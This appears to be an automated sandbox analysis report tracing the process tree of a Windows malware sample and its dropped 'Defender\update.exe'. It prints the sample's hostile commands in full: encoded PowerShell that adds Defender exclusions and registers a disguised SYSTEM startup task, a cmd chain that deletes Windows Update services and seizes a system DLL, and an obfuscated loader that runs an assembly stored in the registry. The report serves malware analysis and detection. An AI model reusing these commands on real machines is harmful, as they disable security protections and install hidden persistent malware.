2424 conhost.exe 94 PID 2424 wrote to memory of 3620 2424 conhost.exe 96 PID 2424 wrote to memory of 3620 2424 conhost.exe 96 PID 2424 wrote to memory of 4780 2424 conhost.exe 98 PID 2424 wrote to memory of 4780 2424 conhost.exe 98 PID 3620 wrote to memory of 2656 3620 cmd.exe 101 PID 3620 wrote to memory of 2656 3620 cmd.exe 101 PID 4780 wrote to memory of 1256 4780 cmd.exe 100 PID 4780 wrote to memory of 1256 4780 cmd.exe 100 PID 2424 wrote to memory of 3864 2424 conhost.exe 102 PID 2424 wrote to memory of 3864 2424 conhost.exe 102 PID 3620 wrote to memory of 4184 3620 cmd.exe 104 PID 3620 wrote to memory of 4184 3620 cmd.exe 104 PID 4780 wrote to memory of 2192 4780 cmd.exe 105 PID 4780 wrote to memory of 2192 4780 cmd.exe 105 PID 4780 wrote to memory of 3676 4780 cmd.exe 106 PID 4780 wrote to memory of 3676 4780 cmd.exe 106 PID 3620 wrote to memory of 1904 3620 cmd.exe 107 PID 3620 wrote to memory of 1904 3620 cmd.exe 107 PID 4780 wrote to memory of 1068 4780 cmd.exe 108 PID 4780 wrote to memory of 1068 4780 cmd.exe 108 PID 3620 wrote to memory of 4584 3620 cmd.exe 109 PID 3620 wrote to memory of 4584 3620 cmd.exe 109 PID 3620 wrote to memory of 4516 3620 cmd.exe 110 PID 3620 wrote to memory of 4516 3620 cmd.exe 110 PID 3620 wrote to memory of 2032 3620 cmd.exe 111 PID 3620 wrote to memory of 2032 3620 cmd.exe 111 PID 3620 wrote to memory of 1136 3620 cmd.exe 112 PID 3620 wrote to memory of 1136 3620 cmd.exe 112 PID 3620 wrote to memory of 3992 3620 cmd.exe 113 PID 3620 wrote to memory of 3992 3620 cmd.exe 113 PID 3620 wrote to memory of 4620 3620 cmd.exe 114 PID 3620 wrote to memory of 4620 3620 cmd.exe 114 PID 3620 wrote to memory of 2500 3620 cmd.exe 115 PID 3620 wrote to memory of 2500 3620 cmd.exe 115 PID 3620 wrote to memory of 3484 3620 cmd.exe 116 PID 3620 wrote to memory of 3484 3620 cmd.exe 116 PID 3620 wrote to memory of 4964 3620 cmd.exe 117 PID 3620 wrote to memory of 4964 3620 cmd.exe 117 PID 2424 wrote to memory of 2252 2424 conhost.exe 118 PID 2424 wrote to memory of 2252 2424 conhost.exe 118 PID 2424 wrote to memory of 2252 2424 conhost.exe 118 PID 2424 wrote to memory of 3912 2424 conhost.exe 119 PID 2424 wrote to memory of 3912 2424 conhost.exe 119 PID 2424 wrote to memory of 864 2424 conhost.exe 121 PID 2424 wrote to memory of 864 2424 conhost.exe 121 PID 3912 wrote to memory of 736 3912 cmd.exe 123 PID 3912 wrote to memory of 736 3912 cmd.exe 123 PID 864 wrote to memory of 4908 864 cmd.exe 124 PID 864 wrote to memory of 4908 864 cmd.exe 124 PID 3620 wrote to memory of 3888 3620 cmd.exe 130 PID 3620 wrote to memory of 3888 3620 cmd.exe 130 PID 3620 wrote to memory of 1384 3620 cmd.exe 131
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:664
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:580
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:328
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4cb8499a-f52c-42b6-a4a0-d3c8f0b5d019}2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4060
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{6aa651d5-cd5c-48bd-80b3-141f653b4a55}2⤵PID:4264
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1092
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2436
-
-
C:\Program Files\Platform\Defender\update.exe"C:\Program Files\Platform\Defender\update.exe"2⤵
- Executes dropped EXE
PID:2444 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1864 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:1320
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4408
-
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:3632
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:736
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:4544
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:4904
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:4668
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
PID:4152
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
PID:3388
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
PID:3712
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
PID:4572
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
PID:2732
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4764
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4996
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
PID:2640
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
PID:3100
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:5088
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:2260
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵PID:2432
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵PID:1576
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵PID:720
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵PID:3500
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵PID:2880
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵PID:3616
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:1332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵PID:4808
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4280
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵PID:1684
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵PID:4908
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵PID:2116
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵PID:4164
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3124
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "epzggvhm"4⤵PID:3080
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J4⤵
- Executes dropped EXE
PID:1496
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1140 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4228
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1336
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3436
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:5068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:5096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4656
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:5044
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2168
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4164
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4164 -s 4642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4668
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3748
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3276
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3276 -s 8802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2160
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe"C:\Users\Admin\AppData\Local\Temp\d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3472
-
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
PID:2656
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:4184
-
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
PID:1904
-
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
PID:4584
-
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
PID:2032
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
PID:1136
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies security service
- Modifies registry key
PID:3992
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
PID:4620
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
PID:2500
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4964
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
PID:3888
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
PID:1384
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
PID:2452
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
PID:1064
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵PID:1940
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵PID:1880
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵PID:4644
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵PID:3700
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵PID:4528
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵PID:3120
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵PID:4712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
